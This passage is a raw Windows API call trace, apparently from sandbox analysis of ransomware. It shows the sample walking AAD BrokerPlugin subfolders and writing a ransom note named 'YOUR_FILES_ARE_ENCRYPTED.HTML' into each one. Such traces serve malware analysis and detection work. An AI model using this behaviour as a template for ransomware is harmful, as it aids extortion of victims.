lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy" [0114.415] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\*" [0114.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54746ebf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.415] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54746ebf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x548ea798, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x548ea798, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0114.415] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0114.415] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.415] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC") returned 92 [0114.415] GetProcessHeap () returned 0x600000 [0114.415] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.416] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC" [0114.416] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\*" [0114.416] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0114.417] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="..", cAlternateFileName="")) returned 1 [0114.417] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0114.417] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.417] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCache") returned 102 [0114.417] GetProcessHeap () returned 0x600000 [0114.417] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.418] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCache" [0114.418] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCache\\*" [0114.418] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0114.418] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName="..", cAlternateFileName="")) returned 1 [0114.419] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName="..", cAlternateFileName="")) returned 0 [0114.419] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0114.419] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0114.419] GetProcessHeap () returned 0x600000 [0114.419] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.420] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.420] CloseHandle (hObject=0x32c) returned 1 [0114.420] GetProcessHeap () returned 0x600000 [0114.420] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.420] GetProcessHeap () returned 0x600000 [0114.421] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.421] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0114.421] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.421] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCookies") returned 104 [0114.421] GetProcessHeap () returned 0x600000 [0114.421] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.422] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCookies" [0114.422] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCookies\\*" [0114.422] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0114.423] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName="..", cAlternateFileName="")) returned 1 [0114.423] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName="..", cAlternateFileName="")) returned 0 [0114.423] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0114.423] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0114.423] GetProcessHeap () returned 0x600000 [0114.423] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.424] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.425] CloseHandle (hObject=0x32c) returned 1 [0114.425] GetProcessHeap () returned 0x600000 [0114.425] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.425] GetProcessHeap () returned 0x600000 [0114.425] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.426] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0114.426] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.426] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetHistory") returned 104 [0114.426] GetProcessHeap () returned 0x600000 [0114.426] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.427] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetHistory" [0114.427] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetHistory\\*" [0114.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.427] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName="..", cAlternateFileName="")) returned 1 [0114.427] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName="..", cAlternateFileName="")) returned 0 [0114.427] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.427] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0114.427] GetProcessHeap () returned 0x600000 [0114.427] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.aad.brokerplugin_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0114.428] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.429] CloseHandle (hObject=0x32c) returned 1 [0114.429] GetProcessHeap () returned 0x600000 [0114.429] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.429] GetProcessHeap () returned 0x600000 [0114.429] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.429] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f165c, dwReserved1=0x6f15a8, cFileName="Temp", cAlternateFileName="")) returned 1 [0114.429] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.429] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\Temp") returned 97 [0114.429] GetProcessHeap () returned 0x600000 [0114.429] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.429] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\Temp" [0114.430] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\Temp\\*" [0114.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0114.430] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName="..", cAlternateFileName="")) returned 1 [0114.430] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x547df81c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x547df81c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x547df81c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x6f15b0, cFileName="..", cAlternateFileName="")) returned 0 [0114.430] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.430] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0114.430] GetProcessHeap () returned 0x600000 [0114.430] RtlAllocateHeap (HeapHandle=0x600000, 